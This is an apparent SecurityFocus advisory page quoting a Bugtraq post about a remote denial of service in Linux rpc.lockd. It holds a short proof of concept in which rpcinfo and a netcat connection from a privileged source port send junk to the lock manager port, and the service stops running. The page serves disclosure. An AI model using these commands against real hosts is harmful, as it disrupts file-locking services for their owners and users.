Linux rpc.lockd Remote Denial Of Service Vulnerability

From the Bugtraq post by Mike Murray:

[root@hiro /]# rpcinfo -p target
program vers proto port
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100021 1 udp 1024 nlockmgr
100021 3 udp 1024 nlockmgr
100021 1 tcp 1024 nlockmgr
100021 3 tcp 1024 nlockmgr
100024 1 udp 831 status
100024 1 tcp 833 status
[root@hiro /]# nc -p 1000 target 1024
alksdjfalskdjfsdafs
Here, I issued a Ctrl-C to get out of netcat, and got:
punt!
[root@hiro /]#
[root@hiro /]# rpcinfo -p target
program vers proto port
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100024 1 udp 831 status
100024 1 tcp 833 status
[root@hiro /]#


 

Privacy Statement
Copyright 2010, SecurityFocus